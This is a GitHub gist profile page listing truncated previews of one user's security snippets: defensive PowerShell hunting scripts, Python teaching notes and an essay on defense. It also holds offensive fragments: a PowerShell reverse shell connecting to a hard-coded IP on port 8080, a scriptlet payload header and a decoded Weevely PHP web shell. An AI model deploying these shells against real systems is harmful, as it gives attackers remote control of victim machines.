Skip to content

Instantly share code, notes, and snippets.

View kwadner's full-sized avatar

Kiel Wadner kwadner

10 followers · 2 following
View GitHub Profile
@kwadner
kwadner / Find-Assemblies.ps1
Created February 14, 2020 17:25 — forked from TheWover/Find-Assemblies.ps1
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
Param([parameter(Mandatory=$true,
HelpMessage="Directory to search for .NET Assemblies in.")]
$Directory,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to search recursively.")]
[switch]$Recurse = $false,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to include DLLs in the search.")]
[switch]$DLLs = $false,
[parameter(Mandatory=$false,
@kwadner
kwadner / Get-InjectedThread.ps1
Created February 13, 2020 17:23 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@kwadner
kwadner / temp.py
Last active January 27, 2020 16:55
temp python functions
# DO: Define all your functions at the top of your script file.
# DO: Use descriptive names for your functions
# DO: Provide a comment block describing what your function does
# DO: Document what is 'returned' from your function
# 1. Why do we need functions/ what are we trying to solve?
# 2. What is a function?
@kwadner
kwadner / write.sct
Last active March 4, 2018 20:29
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@kwadner
kwadner / gist:3b1041b6c3bf9d62cac50950ebe32461
Created March 4, 2018 19:43
$socket = new-object System.Net.Sockets.TcpClient('52.234.133.119', 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
@kwadner
kwadner / weevely_shell_decoded.php
Created August 6, 2015 01:43
<?php
$key_part_one = "5f4d";
$key_part_two = "cc3b";
/* This function is used to obfuscate the raw bytes of the request and the
response for the web shell. It operates as an XOR function on each byte.
The XOR key is the concat of the two key parts at the top of the script.
*/
function xor_obfuscation($data_bytes, $key)
{
@kwadner
kwadner / gist:74f09077ffbe2bfd2863
Last active August 29, 2015 14:19
Thoughts on Defense

Proactive Response vs Reactive Response

  • A defensive posture is proactive, not reactive
  • Defensive actions must respond to the attacker

These two statements contradict at first glance but are accurate. There is a difference in attitude and behavior between responding and reacting.

Falling Castles

The castle analogy does not hold up well, however we spend more time looking inside the castle walls then outside.

Detection in Depth vs Defense in Depth